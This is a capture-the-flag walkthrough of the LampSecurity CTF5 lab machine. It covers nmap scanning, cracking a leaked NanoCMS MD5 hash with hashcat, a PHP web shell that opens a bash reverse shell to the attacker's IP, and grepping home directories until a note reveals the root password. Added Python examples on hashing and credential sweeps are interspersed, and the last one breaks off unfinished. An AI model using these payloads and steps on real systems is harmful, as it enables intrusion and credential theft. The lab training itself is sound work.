LampSecurityCTF5 target machine penetration (CMS information disclosure, text search, privilege escalation via a sensitive file)

LampSecurityCTF5 target machine penetration

Host discovery

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.50.0/24                     
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-23 23:05 CST
Nmap scan report for 192.168.50.1
Host is up (0.00021s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.50.134
Host is up (0.00010s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for 192.168.50.155
Host is up (0.00013s latency).
MAC Address: 00:0C:29:AB:B8:24 (VMware)
Nmap scan report for 192.168.50.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:EC:05:7B (VMware)
Nmap scan report for 192.168.50.147
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.93 seconds
                                                                                                                 
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.50.155
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-23 23:06 CST
Nmap scan report for 192.168.50.155
Host is up (0.0016s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
901/tcp   open  samba-swat
3306/tcp  open  mysql
33302/tcp open  unknown
MAC Address: 00:0C:29:AB:B8:24 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.87 seconds
                                                                                                                 
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,25,80,110,111,139,143,445,901,3306,33302 192.168.50.155
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-23 23:07 CST
Nmap scan report for 192.168.50.155
Host is up (0.00044s latency).

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.7 (protocol 2.0)
25/tcp    open  smtp        Sendmail 8.14.1/8.14.1
80/tcp    open  http        Apache httpd 2.2.6 ((Fedora))
110/tcp   open  pop3        ipop3d 2006k.101
111/tcp   open  rpcbind     2-4 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
143/tcp   open  imap        University of Washington IMAP imapd 2006k.396 (time zone: -0400)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp   open  http        Samba SWAT administration server
3306/tcp  open  mysql       MySQL 5.0.45
33302/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:AB:B8:24 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Service Info: Hosts: localhost.localdomain, 192.168.50.155; OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.69 seconds
                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 10000 -p- 192.168.50.155                                
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-23 23:08 CST
Warning: 192.168.50.155 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.50.155
Host is up (0.0012s latency).
Not shown: 65454 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT      STATE SERVICE
111/udp   open  rpcbind
5353/udp  open  zeroconf
32768/udp open  omad
MAC Address: 00:0C:29:AB:B8:24 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.86 seconds


Vulnerability script scan

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,25,80,110,111,139,143,445,901,3306,33302 192.168.50.155
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-23 23:10 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.50.155
Host is up (0.00023s latency).

PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
80/tcp    open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.50.155
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.50.155:80/events/
|     Form id: user-login-form
|     Form action: /events/?q=node&destination=node
|     
|     Path: http://192.168.50.155:80/?page=contact
|     Form id: 
|     Form action: ?page=contact
|     
|     Path: http://192.168.50.155:80/events/?q=comment/reply/3
|     Form id: comment-form
|     Form action: /events/?q=comment/reply/3
|     
|     Path: http://192.168.50.155:80/events/?q=comment/reply/3
|     Form id: user-login-form
|     Form action: /events/?q=comment/reply/3&destination=comment%2Freply%2F3
|     
|     Path: http://192.168.50.155:80/events/?q=event/2024/09/23/month
|     Form id: event-taxonomy-filter-form
|     Form action: /events/?q=event/2024/09/23/month
|     
|     Path: http://192.168.50.155:80/events/?q=event/2024/09/23/month
|     Form id: event-type-filter-form
|     Form action: /events/?q=event/2024/09/23/month
|     
|     Path: http://192.168.50.155:80/events/?q=event/2024/09/23/month
|     Form id: user-login-form
|     Form action: /events/?q=event/2024/09/23/month&destination=event%2F2024%2F09%2F23%2Fmonth
|     
|     Path: http://192.168.50.155:80/events/?q=tracker
|     Form id: user-login-form
|     Form action: /events/?q=tracker&destination=tracker
|     
|     Path: http://192.168.50.155:80/events/?q=node&destination=node
|     Form id: user-login-form
|     Form action: /events/?q=node&destination=node%3Famp%253Bdestination%3Dnode
|     
|     Path: http://192.168.50.155:80/events/?q=event/2009/04/29
|     Form id: event-taxonomy-filter-form
|     Form action: /events/?q=event/2009/04/29
|     
|     Path: http://192.168.50.155:80/events/?q=event/2009/04/29
|     Form id: event-type-filter-form
|     Form action: /events/?q=event/2009/04/29
|     
|     Path: http://192.168.50.155:80/events/?q=event/2009/04/29
|     Form id: user-login-form
|     Form action: /events/?q=event/2009/04/29&destination=event%2F2009%2F04%2F29
|     
|     Path: http://192.168.50.155:80/events/?q=user/register
|     Form id: user-register
|     Form action: /events/?q=user/register
|     
|     Path: http://192.168.50.155:80/events/?q=node/1
|     Form id: user-login-form
|     Form action: /events/?q=node/1&destination=node%2F1
|     
|     Path: http://192.168.50.155:80/events/?q=comment/reply/2
|     Form id: comment-form
|     Form action: /events/?q=comment/reply/2
|     
|     Path: http://192.168.50.155:80/events/?q=comment/reply/2
|     Form id: user-login-form
|_    Form action: /events/?q=comment/reply/2&destination=comment%2Freply%2F2
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-fileupload-exploiter: 
|   
|_    Couldn't find a file-type field.
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.50.155:80/?page=about%27%20OR%20sqlspider
|     http://192.168.50.155:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.50.155:80/?page=about%27%20OR%20sqlspider
|     http://192.168.50.155:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.50.155:80/?page=about%27%20OR%20sqlspider
|     http://192.168.50.155:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.50.155:80/?page=about%27%20OR%20sqlspider
|     http://192.168.50.155:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.50.155:80/events/?q=event%2Ffeed%27%20OR%20sqlspider
|     http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.50.155:80/events/?q=event%2Ffeed%27%20OR%20sqlspider
|     http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
|_    http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /info.php: Possible information file
|   /phpmyadmin/: phpMyAdmin
|   /squirrelmail/src/login.php: squirrelmail version 1.4.11-1.fc8
|   /squirrelmail/images/sm_logo.png: SquirrelMail
|   /icons/: Potentially interesting folder w/ directory listing
|_  /inc/: Potentially interesting folder
110/tcp   open  pop3
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
901/tcp   open  samba-swat
3306/tcp  open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
33302/tcp open  unknown
MAC Address: 00:0C:29:AB:B8:24 (VMware)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 174.31 seconds


Web penetration

Visit port 80

The blog mentions NanoCMS, which looks like a way in.
Check with searchsploit: there is an authenticated remote code execution (RCE) exploit.

┌──(kali㉿kali)-[~]
└─$ sudo searchsploit nanocms
[sudo] password for kali: 
------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                 |  Path
------------------------------------------------------------------------------- ---------------------------------
NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)                     | php/webapps/50997.py
------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Search the web for "nanocms exploit":
http://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.100141

Good, found a txt file that leaks the password hash:
http://192.168.50.155/~andy/data/pagesdata.txt
Web search is very useful here; this path cannot be found with ordinary dirb or gobuster runs.

┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.50.155/~andy/                                              

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Sep 23 23:22:34 2024
URL_BASE: http://192.168.50.155/~andy/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.50.155/~andy/ ----
==> DIRECTORY: http://192.168.50.155/~andy/data/                                                                                          
+ http://192.168.50.155/~andy/index.php (CODE:200|SIZE:1965)                                                                              
                                                                                                                                          
---- Entering directory: http://192.168.50.155/~andy/data/ ----
+ http://192.168.50.155/~andy/data/index.php (CODE:302|SIZE:0)                                                                            
==> DIRECTORY: http://192.168.50.155/~andy/data/libs/                                                                                     
==> DIRECTORY: http://192.168.50.155/~andy/data/pages/                                                                                    
                                                                                                                                          
---- Entering directory: http://192.168.50.155/~andy/data/libs/ ----
                                                                                                                                          
---- Entering directory: http://192.168.50.155/~andy/data/pages/ ----
                                                                                                                                          
-----------------
END_TIME: Mon Sep 23 23:23:08 2024
DOWNLOADED: 18448 - FOUND: 2
                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.50.155 -w /usr/share/wordlists/dirbuster/directories.jbrofuzz 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.50.155
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directories.jbrofuzz
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
[ERROR] parse "http://192.168.50.155/%": invalid URL escape "%"
/.                    (Status: 200) [Size: 1538]
/??                   (Status: 200) [Size: 1538]
/events               (Status: 301) [Size: 316] [--> http://192.168.50.155/events/]
/inc                  (Status: 301) [Size: 313] [--> http://192.168.50.155/inc/]
/list                 (Status: 301) [Size: 314] [--> http://192.168.50.155/list/]
/mail                 (Status: 301) [Size: 314] [--> http://192.168.50.155/mail/]
/phpmyadmin           (Status: 301) [Size: 320] [--> http://192.168.50.155/phpmyadmin/]
/squirrelmail         (Status: 301) [Size: 322] [--> http://192.168.50.155/squirrelmail/]
Progress: 58688 / 58689 (100.00%)
===============================================================
Finished
===============================================================


Even when specifying extensions, it still isn't found.

Locate the password hash and try to crack it.

a:12:{s:8:"homepage";s:1:"1";s:10:"links_cats";a:4:{s:7:"sidebar";a:2:{i:0;i:1;i:1;i:4;}s:11:"other-pages";a:0:{}s:14:"top-navigation";a:2:{i:0;s:1:"1";i:1;s:1:"4";}s:12:"Footer-Right";a:2:{i:0;s:1:"1";i:1;s:1:"4";}}s:5:"slugs";a:2:{i:1;s:4:"home";i:4;s:7:"contact";}s:6:"titles";a:2:{i:1;s:4:"Home";i:4;s:7:"Contact";}s:10:"slug_count";i:11;s:8:"settings";a:3:{s:19:"index-last-modified";i:1234513760;s:18:"def-template-areas";a:4:{i:0;s:12:"website name";i:2;s:14:"website slogan";i:3;s:16:"below navigation";i:4;s:16:"copyright notice";}s:18:"def-template-links";a:2:{i:0;s:14:"top-navigation";i:1;s:12:"Footer-Right";}}s:13:"active-tweaks";a:2:{i:0;s:7:"deutsch";i:1;s:19:"language-pack-tweak";}s:11:"lang-select";s:7:"english";s:6:"seourl";s:1:"0";s:8:"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";}
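The file above is the output of PHP's serialize(), which is how NanoCMS persists its settings, and the credential sits in it as a bare 32-hex-character digest. As an added example that is not part of the original write-up or of NanoCMS, here is a small Python parser for that format together with a check that pulls out the stored credential and flags it as a raw MD5-shaped hash. SAMPLE_PAGESDATA is a constructed, shortened record that keeps the same field layout as the page's pagesdata.txt (the hash value is the one shown above); PHPUnserializer, unserialize and extract_credentials are names chosen for this example.

```python
import re

# Constructed sample: a shortened pagesdata.txt with the same field layout
# as the leaked file above (nested array, username, raw MD5 password hash).
SAMPLE_PAGESDATA = (
    b'a:4:{s:8:"settings";a:1:{s:19:"index-last-modified";i:1234513760;}'
    b's:8:"username";s:5:"admin";'
    b's:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";'
    b's:7:"version";s:4:"v_4f";}'
)

RAW_MD5_RE = re.compile(r"[0-9a-f]{32}")


class PHPUnserializer:
    """Minimal recursive-descent parser for PHP serialize() output.

    Works on bytes because PHP string lengths (s:N:) count bytes, not characters.
    Supports N (null), b (bool), i (int), d (float), s (string) and a (array).
    """

    def __init__(self, data: bytes):
        self.data = data
        self.pos = 0

    def parse(self):
        value = self._value()
        if self.pos != len(self.data):
            raise ValueError("trailing data after serialized value")
        return value

    def _expect(self, token: bytes):
        if not self.data.startswith(token, self.pos):
            raise ValueError(f"expected {token!r} at offset {self.pos}")
        self.pos += len(token)

    def _read_until(self, delim: bytes) -> bytes:
        end = self.data.index(delim, self.pos)
        token = self.data[self.pos:end]
        self.pos = end + len(delim)
        return token

    def _value(self):
        tag = self.data[self.pos:self.pos + 1]
        self.pos += 1
        if tag == b"N":
            self._expect(b";")
            return None
        self._expect(b":")
        if tag == b"b":
            return self._read_until(b";") == b"1"
        if tag == b"i":
            return int(self._read_until(b";"))
        if tag == b"d":
            return float(self._read_until(b";"))
        if tag == b"s":
            length = int(self._read_until(b":"))
            self._expect(b'"')
            raw = self.data[self.pos:self.pos + length]
            self.pos += length
            self._expect(b'";')
            return raw.decode("utf-8", errors="replace")
        if tag == b"a":
            count = int(self._read_until(b":"))
            self._expect(b"{")
            result = {}
            for _ in range(count):
                key = self._value()          # PHP array keys are ints or strings
                result[key] = self._value()
            self._expect(b"}")
            return result
        raise ValueError(f"unsupported type tag {tag!r} at offset {self.pos - 1}")


def unserialize(data: bytes):
    return PHPUnserializer(data).parse()


def extract_credentials(data: bytes) -> dict:
    """Pull the admin credential out of a NanoCMS pagesdata record and note
    whether the password field is a bare 32-hex digest (an unsalted MD5 as far
    as the file reveals), which is what makes wordlist cracking so cheap."""
    record = unserialize(data)
    password = record.get("password", "")
    return {
        "username": record.get("username"),
        "password_hash": password,
        "looks_like_raw_md5": RAW_MD5_RE.fullmatch(password) is not None,
    }


if __name__ == "__main__":
    print(extract_credentials(SAMPLE_PAGESDATA))
```

Running the script against a real pagesdata.txt (read as bytes) works the same way; the parser refuses trailing garbage, so a truncated download fails loudly instead of returning a partial record.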

Crack it:

9d2f75377ac0ab991d40c91fd27e52fd

We'll use the rockyou wordlist. For the .gz format use gunzip; the -k option keeps the .gz file while decompressing, so both the compressed and the decompressed file remain in the directory.

┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ sudo gunzip rockyou.txt.gz -k

Using rockyou as the MD5 cracking dictionary is for learning on this target; web-based MD5 lookup services are more general and faster.

┌──(kali㉿kali)-[~]
└─$ sudo hashcat -m 0 -a 0 9d2f75377ac0ab991d40c91fd27e52fd /usr/share/wordlists/rockyou.txt
[sudo] password for kali: 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 7 8845HS w/ Radeon 780M Graphics, 2913/5891 MB (1024 MB allocatable), 6MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB
                                                                                                                                  
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt                                                                                    
* Passwords.: 14344392                                                                                                            
* Bytes.....: 139921507                                                                                                           
* Keyspace..: 14344385                                                                                                            
* Runtime...: 1 sec                                                                                                               
                                                                                                                                  
9d2f75377ac0ab991d40c91fd27e52fd:shannon                  
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 9d2f75377ac0ab991d40c91fd27e52fd
Time.Started.....: Tue Sep 24 22:03:57 2024 (0 secs)
Time.Estimated...: Tue Sep 24 22:03:57 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    74450 H/s (0.19ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3072/14344385 (0.02%)
Rejected.........: 0/3072 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> dangerous
Hardware.Mon.#1..: Util: 12%

Started: Tue Sep 24 22:03:36 2024
Stopped: Tue Sep 24 22:03:58 2024
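hashcat recovers the plaintext after 3072 candidates because the CMS stores a raw, unsalted, single-round MD5: one hash computation per wordlist entry is the whole cost. As an added example that is not from the write-up or from NanoCMS, the Python below confirms the leaked digest against a tiny constructed wordlist the same way hashcat -m 0 -a 0 does, and beside it shows what a salted, iterated hash (PBKDF2-HMAC-SHA256 from the standard library) changes for the same password. WORDLIST, md5_dictionary_match, hash_password, verify_password and same_password_same_hash are names chosen for this example.

```python
import hashlib
import hmac
import os
from typing import Optional

# Digest leaked from pagesdata.txt on the page (hashcat recovered it as "shannon").
LEAKED_MD5 = "9d2f75377ac0ab991d40c91fd27e52fd"

# Constructed stand-in for rockyou.txt: a handful of common candidates.
WORDLIST = ["123456", "password", "iloveyou", "shannon", "dangerous"]


def md5_dictionary_match(hexdigest: str, words) -> Optional[str]:
    """Return the first word whose raw MD5 equals hexdigest, else None.

    This is all an unsalted, single-round hash costs: one md5() per candidate,
    which is why the hashcat run above reports tens of thousands of hashes per
    second on a CPU and stops at 0.02% of the keyspace.
    """
    target = hexdigest.lower()
    for word in words:
        if hashlib.md5(word.encode("utf-8")).hexdigest() == target:
            return word
    return None


def hash_password(password: str, iterations: int = 200_000,
                  salt: Optional[bytes] = None) -> str:
    """Store a password as a random salt plus iterated PBKDF2-HMAC-SHA256,
    in a self-describing string so the parameters can be raised later."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def same_password_same_hash(password: str) -> bool:
    """With a random per-user salt, two stores of one password never match,
    so a precomputed table or one cracked hash does not carry over to other users."""
    return hash_password(password) == hash_password(password)


if __name__ == "__main__":
    print("dictionary match:", md5_dictionary_match(LEAKED_MD5, WORDLIST))
    stored = hash_password("shannon")
    print(stored)
    print("verify ok:", verify_password("shannon", stored))
    print("identical hashes for same password:", same_password_same_hash("shannon"))
```

The iteration count here is an illustration; tune it to the hardware so a single verification takes a noticeable fraction of a second. A dictionary word like "shannon" still falls to a wordlist, so the slow hash limits the damage rather than replacing a password policy.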

Try the credentials:
admin
shannon

Login succeeded.
Write a small web shell:

More information at andycarp.com
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.147/1234 0>&1'"); ?>

Basic reverse shell

Initial shell

Check the basic information: current user, IP, kernel, the current user's privileges, the dpkg package manager, and so on.

Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.50.155:59919.
bash: no job control in this shell
bash-3.2$ whoami
apache
bash-3.2$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:ab:b8:24 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.155/24 brd 192.168.50.255 scope global eth1
    inet6 fe80::20c:29ff:feab:b824/64 scope link 
       valid_lft forever preferred_lft forever
bash-3.2$ dpkg -l
bash: dpkg: command not found
bash-3.2$ uname -a
Linux localhost.localdomain 2.6.23.1-42.fc8 #1 SMP Tue Oct 30 13:55:12 EDT 2007 i686 athlon i386 GNU/Linux
bash-3.2$ sudo -l
sudo: sorry, you must have a tty to run sudo
bash-3.2$   

Look at the users:

bash-3.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash

Use grep to find text files containing the string. To keep the output readable, send the error messages to /dev/null:
grep -R -i pass /home/* 2>/dev/null

There is a lot of output; pick out the useful parts. This file looks useful:
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note

/home/andy/public_html/data/admin-design/loginform.php:    <tr><td><?php _lt('Password'); ?></td><td><input type='password' name='pass'></td></tr>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <title>Root password</title>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <text xml:space="preserve"><note-content version="0.1">Root password
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:46 AM [DEBUG]: Renaming note from New Note 3 to Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:56 AM [DEBUG]: Saving 'Root password'...
/home/patrick/.tomboy.log:12/5/2012 7:25:03 AM [DEBUG]: Saving 'Root password'...

The file leaks the root user's password:
50$cent

bash-3.2$ cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
  <title>Root password</title>
  <text xml:space="preserve"><note-content version="0.1">Root password

Root password

50$cent</note-content></text>
  <last-change-date>2012-12-05T07:24:52.7364970-05:00</last-change-date>
  <create-date>2012-12-05T07:24:34.3731780-05:00</create-date>
  <cursor-position>15</cursor-position>
  <width>450</width>
  <height>360</height>
  <x>0</x>
  <y>0</y>
  <open-on-startup>False</open-on-startup>
</note>bash-3.2$ 
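The grep -R -i pass /home/* search above is a one-line version of a check worth running regularly from the defender's side: a sweep of home directories for plaintext credentials in notes, shell histories and config files. The Python below, an added example that is not part of the write-up, builds a constructed home tree (a Tomboy-style .note modelled on the file shown above but with a made-up secret, plus harmless files), scans it for credential keywords while skipping binary files, and parses the note's XML to extract the body, which is what a triage script would put in its report. build_sample_home, find_credential_mentions, tomboy_note_text and run_demo are names chosen for this example.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Keywords a sweep for plaintext credentials looks for (case-insensitive).
CREDENTIAL_RE = re.compile(r"pass(word|wd|phrase)?|secret", re.IGNORECASE)
TOMBOY_NS = "{http://beatniksoftware.com/tomboy}"

# Constructed Tomboy note in the same layout as the one found under /home/patrick,
# with a made-up secret instead of the real password.
SAMPLE_NOTE = """<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
  <title>Root password</title>
  <text xml:space="preserve"><note-content version="0.1">Root password

Root password

example-secret-42</note-content></text>
  <last-change-date>2012-12-05T07:24:52.7364970-05:00</last-change-date>
  <open-on-startup>False</open-on-startup>
</note>
"""


def build_sample_home(base: str) -> None:
    """Lay out a tiny /home lookalike: one user with the note, one without secrets,
    and a binary blob that must be skipped rather than matched."""
    note_dir = os.path.join(base, "patrick", ".tomboy")
    os.makedirs(note_dir)
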